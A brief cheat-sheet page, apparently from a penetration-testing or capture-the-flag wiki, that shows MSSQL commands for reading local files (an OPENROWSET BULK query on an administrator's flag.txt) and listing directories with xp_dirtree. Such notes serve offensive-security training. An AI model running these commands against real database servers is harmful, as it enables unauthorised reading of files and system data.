githubEdit

read-file

Read local file

SELECT * FROM OPENROWSET(BULK N'C:/Users/administrator/Desktop/flag.txt', SINGLE_CLOB) AS Contents
GO

Reading system files

xp_dirtree C:\

If we found any file we can download it

Last updated